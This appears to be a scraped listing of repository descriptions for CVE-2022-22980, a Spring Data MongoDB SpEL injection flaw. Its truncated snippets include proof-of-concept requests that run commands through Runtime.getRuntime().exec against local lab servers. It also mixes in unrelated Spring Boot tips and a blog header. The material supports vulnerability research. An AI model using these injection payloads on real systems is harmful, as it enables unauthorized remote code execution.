CVE-2022-22980

Poc of CVE-2022-22980

CVE-2022-22980 A local based poc of CVE-2022-22980, for the detail of this vulnerability see tanzuvmwarecom/security/cve-2022-22980 You need to install mongodb on locahost before running And I've create a web based poc with docker on dockerv Run mvn spring-boot:run or open with IDEA, and launch the AccessingDataMongodbAp

CVE-2022-22980环境

Spring-Data-Mongodb-Demo CVE-2022-22980环境

CVE-2022-22980 exp && 靶场

spring-data-mongodb-cve-2022-22980-exp 鸡肋漏洞，只是记录。 启动redis，27017端口 启动项目，springboot启动在6666端口 GET /v1/user/get?username=T(javalangRuntime)getRuntime()exec('open+-a+calculatorapp') HTTP/11 Host: localhost:6666 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=09,en;q=08 User-Agent: Mozil

CVE-2022-22980 exp && 靶场

spring-data-mongodb-cve-2022-22980-exp 鸡肋漏洞，只是记录。 启动redis，27017端口 启动项目，springboot启动在6666端口 GET /v1/user/get?username=T(javalangRuntime)getRuntime()exec('open+-a+calculatorapp') HTTP/11 Host: localhost:6666 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=09,en;q=08 User-Agent: Mozil

[CVE-2022-22980] Spring Data MongoDB SpEL Expression Injection

[CVE-2022-22980] Spring Data MongoDB SpEL Expression Injection MongoDB is a document-oriented NoSQL database with the scalable and flexible that used for high volume data storage Instead of using tables and rows as in the traditional relational databases, MongoDB makes use of collections and documents Documents consist of key-value pairs which are the basic unit of data in M

spring data mongodb remote code execution | cve-2022-22980 poc

Spring_cve-2022-22980 spring data mongodb remote code execution | cve-2022-22980 poc Description A Spring Data MongoDB application is vulnerable to #SpEL #injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized Video POC Follow us for latest exploit POC Y

CVE-2022-22980环境

Spring-Data-Mongodb-Example CVE-2022-22980环境 Build docker environment docker build -t mongo docker run -dit -p 6666:6666 mongo Poc ➜ Spring-Data-Mongodb-Example git:(main) curl 0:6666/v1/user/get -d 'id=T(javalangRuntime)getRuntime()exec("touch /tmp/aaaa")' {"timestamp":"2022-07-14T01:54:10

Tips and Tricks to organize backend code for Java and Spring Boot

Organizing your Java/Spring Boot backend Contents Background Maven Parent POM Maven enforcer Pipeline Quality-Control on Merge OWASP check - exclusion list Branching strategy and automatic versioning Configuration Management APIs - generation & sharing/consumption Automated System Integration Tests and Reports Additional Content Kafka Schema Definition Renovate

<a href="sumsec.me"><img src="https://readme-typing-svg.demolab.com?font=Fira+Code&size=24&pause=1000&color=FDFDFD&background=13797800&center=true&vCenter=true&width=435&lines=%F0%9F%91%8B%EF%BC%8C%E5%83%8F%E6%B8%85%E6%B0%B4%E4%B8%80%E8%88%AC%E6%B8%85%E6%BE%88%E9%80%8F%E6%98%8E" alt="SummerSec" /></a>

🏯&nbsp;HOME 📁 Archives   📣&nbsp;About ME&nbsp;  📒Old Blog  📌&nbsp;Advertisements  🌐&nbsp;SiteMap   🗂 Resources 🔭 RSSxml 时间轴 📈 2022 📅 Time Name Tags 12/09 VMWare-Workspace-ONE-Access-Auth-Bypass 漏洞分析/Java/RCE 09/28 Spring-Framework-RCE-CVE-2022-22965漏洞分析 漏洞�

𝐇𝐞𝐥𝐥𝐨 𝐭𝐡𝐞𝐫𝐞, 𝐟𝐞𝐥𝐥𝐨𝐰 &lt;𝚌𝚘𝚍𝚎𝚛𝚜/&gt;!

<a href="sumsec.me"><img src="https://readme-typing-svg.demolab.com?font=Fira+Code&size=24&pause=1000&color=FDFDFD&background=13797800&center=true&vCenter=true&width=435&lines=%F0%9F%91%8B%EF%BC%8C%E5%83%8F%E6%B8%85%E6%B0%B4%E4%B8%80%E8%88%AC%E6%B8%85%E6%BE%88%E9%80%8F%E6%98%8E" alt="SummerSec" /></a>

🏯&nbsp;HOME 📁 Archives   📣&nbsp;About ME&nbsp;  📒Old Blog  📌&nbsp;Advertisements  🌐&nbsp;SiteMap   🗂 Resources 🔭 RSSxml 时间轴 📈 2022 📅 Time Name Tags 12/09 VMWare-Workspace-ONE-Access-Auth-Bypass 漏洞分析/Java/RCE 09/28 Spring-Framework-RCE-CVE-2022-22965漏洞分析 漏洞�